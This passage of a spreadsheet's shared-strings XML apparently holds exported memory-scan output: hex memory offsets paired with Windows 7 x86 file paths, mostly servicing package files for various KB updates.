    <t>\Windows\servicing\Packages\Package_for_KB2563227_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde898690</t>
  </si>
  <si>
    <t>0xde898748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2563227~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde898b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2705219_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde898f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2705219_RTM~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde899298</t>
  </si>
  <si>
    <t>0xde899748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2640148_RTM~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde899a78</t>
  </si>
  <si>
    <t>0xde899b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2640148~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde899f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2563227_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89a350</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Branding-Enterprise-Client-Package~31bf3856ad364</t>
  </si>
  <si>
    <t>e35~x86~~6.1.</t>
  </si>
  <si>
    <t>0xde89a408</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2984972_SP1~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89a5f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89a758</t>
  </si>
  <si>
    <t>0xde89a810</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB3031432~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89aa30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89ad98</t>
  </si>
  <si>
    <t>0xde89ae50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89b3c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4019990_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89b6f8</t>
  </si>
  <si>
    <t>0xde89b7b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4019990~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89bb98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2992611_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89bec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_429_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89bf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2992611~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89c1a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3022777~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89c390</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3011780_SP1~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89c7b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89cae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_79_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89cb98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3003743_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89cec8</t>
  </si>
  <si>
    <t>0xde89cf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89d100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2985461_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89d2a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Personalization-Package~31bf3856ad364e35~x86~~6.</t>
  </si>
  <si>
    <t>0xde89d360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89d580</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89d680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2972100~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89d900</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3021674~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89dce8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3022777_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89df80</t>
  </si>
  <si>
    <t>0xde89e1d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3004361~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89e500</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_430_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89e5b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3004375_SP1~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89e8e8</t>
  </si>
  <si>
    <t>0xde89e9a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89ee50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3021674_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89f200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3030377~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89f5e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3035132_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89f918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_363_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89f9d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3035132~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde89fd00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Server-Help-Package.ClientEnterprise~31bf3856ad364e35~x86~~6.1.760</t>
  </si>
  <si>
    <t>0.16385.mum_x001B_[</t>
  </si>
  <si>
    <t>0xde89fdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3004361_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a0308</t>
  </si>
  <si>
    <t>0xde8a03c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3159398_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a07a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3159398~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a0b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SnippingTool-Package~31bf3856ad364e35~x86~~6.1.7</t>
  </si>
  <si>
    <t>0xde8a0c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3030377_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a1310</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_428_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a13c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3020370~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a16f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SnippingTool-Package~31bf3856ad364e35~x86~en-US~</t>
  </si>
  <si>
    <t>0xde8a17b0</t>
  </si>
  <si>
    <t>0xde8a1b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3045685_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a1f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3045685~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a23c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3055642~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a27b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3061518_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a2ae0</t>
  </si>
  <si>
    <t>0xde8a2b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3061518~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a2f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3020370_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a3140</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3054476_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a3528</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3054476~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a3710</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3031432_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a3b30</t>
  </si>
  <si>
    <t>0xde8a3e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Security-SPP-Component-SKU-Enterprise-Package~31</t>
  </si>
  <si>
    <t>bf3856ad364e3</t>
  </si>
  <si>
    <t>5~x86~~6.1.</t>
  </si>
  <si>
    <t>7600.1</t>
  </si>
  <si>
    <t>0xde8a3f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3055642_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a4038</t>
  </si>
  <si>
    <t>0xde8a4150</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3072305_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a4208</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3072305~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a4370</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-NetworkDiagnostics-DirectAccessEntry-Package~31b</t>
  </si>
  <si>
    <t>~x86~~6.1.7</t>
  </si>
  <si>
    <t>600.16</t>
  </si>
  <si>
    <t>0xde8a4428</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4040980~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a4648</t>
  </si>
  <si>
    <t>0xde8a4868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3059317_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a4c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3059317~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a4f80</t>
  </si>
  <si>
    <t>0xde8a5468</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_436_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a5520</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a5850</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2547666~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K_x001B_[100</t>
  </si>
  <si>
    <t>0xde8a5908</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3068708_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a5db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a6038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3060716_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a6548</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3161949_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a6930</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3161949~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a6b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2547666~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a6c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3076895~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a7038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3076895_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a73c8</t>
  </si>
  <si>
    <t>0xde8a7480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3084135~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a7868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3078601_SP1~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a7c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3078601~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a7f18</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C4</t>
  </si>
  <si>
    <t>6E7B0F942663A</t>
  </si>
  <si>
    <t>1EDC8D9D6D7</t>
  </si>
  <si>
    <t>_6043FC604A395E1485AF7AC16D16B7CE_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a82f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-StickyNotes-Package~31bf3856ad364e35~x86~~6.1.76</t>
  </si>
  <si>
    <t>0xde8a83a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3078667~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a87b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3092627_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a8b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3092627~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a8ec8</t>
  </si>
  <si>
    <t>\Windows\System32\sppcomapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a8f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3084135_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a9388</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8a96d8</t>
  </si>
  <si>
    <t>0xde8a9790</t>
  </si>
  <si>
    <t>0xde8a9b98</t>
  </si>
  <si>
    <t>0xde8a9f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3078667_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8aa3a8</t>
  </si>
  <si>
    <t>0xde8aa630</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3097989~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8aa6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_62_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8aa8d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3101722_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8aacb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3101722~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8aaf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_435_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ab248</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2836942_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ab3b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ab468</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2836942~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ab610</t>
  </si>
  <si>
    <t>0xde8ab6c8</t>
  </si>
  <si>
    <t>86~pt-PT~7.</t>
  </si>
  <si>
    <t>0xde8ab910</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_16_for_KB2973112~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8aba78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Shell-SoundThemes-Package~31bf3856ad364e35~x86~~</t>
  </si>
  <si>
    <t>0xde8abb30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_16_for_KB2943357~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8abe18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3072305~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ac368</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3177467_SP1~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ac698</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Aux-AuxComp~31bf3856ad364e35~x86~en-US~7.6.760</t>
  </si>
  <si>
    <t>0xde8ac750</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3177467~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ac870</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2861698_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8aca90</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2861698~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8acbf8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_78_for_KB2685811~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8accb0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2836942~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ad3d8</t>
  </si>
  <si>
    <t>0xde8ad708</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3155178_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ad7c0</t>
  </si>
  <si>
    <t>0xde8ad910</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2840631_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8adb30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2840631~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8add60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2972100_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ade18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2861698~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8adf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_439_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ae1f8</t>
  </si>
  <si>
    <t>0xde8ae318</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2736422_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ae480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2900986~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ae538</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2736422~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ae6e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2639308~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8aeac8</t>
  </si>
  <si>
    <t>86~cs-CZ~7.</t>
  </si>
  <si>
    <t>0xde8aed68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8aef80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2840631~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8af038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2736422~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8af1b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PlatformUpdate-Win7-SRV08R2-Package~31bf3856ad36</t>
  </si>
  <si>
    <t>4e35~x86~nb-N</t>
  </si>
  <si>
    <t>O~7.1.7601.</t>
  </si>
  <si>
    <t>16492.</t>
  </si>
  <si>
    <t>0xde8af4e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-VirtualPC-Licensing-Package~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>0xde8af598</t>
  </si>
  <si>
    <t>4e35~x86~fi-F</t>
  </si>
  <si>
    <t>I~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8af830</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2972100~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8af9b0</t>
  </si>
  <si>
    <t>4e35~x86~th-T</t>
  </si>
  <si>
    <t>H~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8afc98</t>
  </si>
  <si>
    <t>4e35~x86~fr-F</t>
  </si>
  <si>
    <t>R~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8afe18</t>
  </si>
  <si>
    <t>4e35~x86~~7.1</t>
  </si>
  <si>
    <t>.7601.16492</t>
  </si>
  <si>
    <t>0xde8aff80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiabr005.inf_x86_neutral_ad07b12feea9a3ff\wiabr00</t>
  </si>
  <si>
    <t>0xde8b0298</t>
  </si>
  <si>
    <t>4e35~x86~pl-P</t>
  </si>
  <si>
    <t>L~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b05c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b0680</t>
  </si>
  <si>
    <t>4e35~x86~pt-B</t>
  </si>
  <si>
    <t>0xde8b09b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-VirtualXP-Licensing-Package~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>0xde8b0a68</t>
  </si>
  <si>
    <t>4e35~x86~sk-S</t>
  </si>
  <si>
    <t>K~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b0e50</t>
  </si>
  <si>
    <t>4e35~x86~bg-B</t>
  </si>
  <si>
    <t>G~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b11d0</t>
  </si>
  <si>
    <t>4e35~x86~el-G</t>
  </si>
  <si>
    <t>0xde8b1500</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Killbits-Package~31bf3856ad364e35~x86~~8.0.7600.</t>
  </si>
  <si>
    <t>0xde8b15b8</t>
  </si>
  <si>
    <t>S~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b1a68</t>
  </si>
  <si>
    <t>4e35~x86~en-G</t>
  </si>
  <si>
    <t>B~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b1e50</t>
  </si>
  <si>
    <t>4e35~x86~ro-R</t>
  </si>
  <si>
    <t>0xde8b2038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_438_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
